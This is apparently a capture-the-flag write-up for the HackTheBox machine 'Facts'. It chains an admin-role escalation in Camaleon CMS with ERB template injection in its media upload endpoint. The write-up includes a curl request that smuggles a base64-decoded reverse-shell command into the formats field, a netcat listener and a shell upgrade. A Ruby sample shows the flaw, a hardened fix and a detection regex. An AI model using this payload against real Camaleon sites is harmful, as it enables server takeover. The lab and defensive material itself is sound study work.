Facts

HackTheBox Easy Linux

Overview

Facts is a Linux box running Camaleon CMS behind nginx. The path to a shell chains two CVEs: a privilege escalation inside the CMS (CVE-2025-2304) that turns a freshly registered account into an administrator, followed by server-side template injection in the media upload endpoint (CVE-2023-30145) that yields a reverse shell. No separate escalation to root was needed; the web application process already ran with enough access to read both flags.

Enumeration

Nmap Scan

nmap -Pn -sC -sV -T4 --min-rate 3000 -oN facts_initial.txt facts.htb

The scan found two open ports, and a subsequent full port scan confirmed that no additional services were exposed.

Web Reconnaissance

Browsing to http://facts.htb revealed a Camaleon CMS installation. Camaleon is a Ruby on Rails-based CMS with a known track record of security issues. Directory enumeration exposed the admin panel at /admin.

Admin Access — CVE-2025-2304

CVE-2025-2304 is a privilege escalation vulnerability in Camaleon CMS that lets a low-privilege registered user promote their own account to administrator without authorisation. After registering a standard account, the flaw was triggered to obtain an admin session cookie:

# Post-registration privilege escalation to the admin role
# The role assignment endpoint is manipulated directly; no admin credentials are required
_factsapp_session=[admin session token]

With the admin session cookie captured, full access to the CMS backend was confirmed by navigating to the dashboard.

Remote Code Execution — CVE-2023-30145 (SSTI)

CVE-2023-30145 is a server-side template injection vulnerability in Camaleon CMS's media upload handler. The formats parameter of /admin/media/upload is passed unsanitised into an ERB template context, allowing arbitrary Ruby evaluation:

# Probe sent in the formats parameter to confirm SSTI
<%= 7*7 %>
# The response contains 49 instead of the literal tag: the field is evaluated as ERB
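The rendering mistake behind this class of bug, shown here as an added Ruby example and not as Camaleon's own code: a hypothetical handler that feeds the formats field straight into ERB (so the arithmetic probe above comes back as 49), the hardened version that treats formats as an allow-listed list of plain strings, and a request-level pre-filter that flags ERB delimiters. The function names, the allow-list contents and the sample inputs are assumptions made for the illustration.

```ruby
require 'erb'

# Constructed illustration of the SSTI pattern behind CVE-2023-30145.
# This is not Camaleon's source; it reproduces the shape of the flaw: a
# request field ('formats') is rendered as an ERB template, so any
# <%= ... %> tag in it is evaluated as Ruby on the server.
def render_formats_vulnerable(formats)
  ERB.new(formats).result(binding)
end

# Hardened handler (assumed allow-list). 'formats' is data, not a template:
# split on commas, strip whitespace, keep only known values. Nothing
# user-supplied is ever handed to ERB.
ALLOWED_FORMATS = %w[image audio video document].freeze

def parse_formats_hardened(formats)
  formats.to_s.split(',').map(&:strip).select { |f| ALLOWED_FORMATS.include?(f) }
end

# Defence-in-depth check a pre-filter or WAF rule could apply to the field:
# reject any value carrying ERB delimiters. The allow-list above is the
# real fix; this only catches the obvious payload shape.
ERB_TAG = /<%.*?%>/m

def erb_tag?(value)
  ERB_TAG.match?(value.to_s)
end

if __FILE__ == $PROGRAM_NAME
  probe = 'R<%= 7*7 %>R'   # the page's arithmetic probe, wrapped as in the exploit
  puts render_formats_vulnerable(probe)      # R49R: the template was evaluated
  p parse_formats_hardened('image, video')  # ["image", "video"]
  p parse_formats_hardened(probe)           # []: the probe is not an allowed format
  p erb_tag?(probe)                          # true
end
```

Run it as a plain script; the vulnerable function prints R49R for the probe, which is exactly the signal the write-up uses to confirm injection. Swapping `7*7` for a `system(...)` call is the step the exploit below takes, which is why the only acceptable fix is to stop treating the field as a template at all.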

With SSTI confirmed in the formats parameter, a reverse shell payload was injected:

# BASE64PAYLOAD is the base64-encoded reverse shell command; the listener must already be running
curl -s -X POST http://facts.htb/admin/media/upload?actions=false \
  -H "Cookie: _factsapp_session=..." \
  -H "X-Requested-With: XMLHttpRequest" \
  -F "file_upload=@test.txt;type=text/plain" \
  -F 'formats=R<%= system("echo BASE64PAYLOAD|base64 -d|bash") %>R'

A netcat listener caught the connection and an interactive shell was obtained as the web application user.

Shell Upgrade and Flags

# Listener, started before the upload request is sent
nc -lvnp 4444
# Once the shell connects, upgrade it to a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

Both the user and root flags were readable from the shell obtained through the web process, which ran with enough privilege on this box that no further escalation was needed.

Key Takeaways

This box demonstrates how chaining two separate CVEs, a privilege escalation within the application (CVE-2025-2304) and an injection flaw (CVE-2023-30145), leads to full system compromise. SSTI in a media upload parameter is a class of bug that is easy to miss in code review when developers trust the CMS's abstractions instead of auditing where request parameters actually reach the template renderer.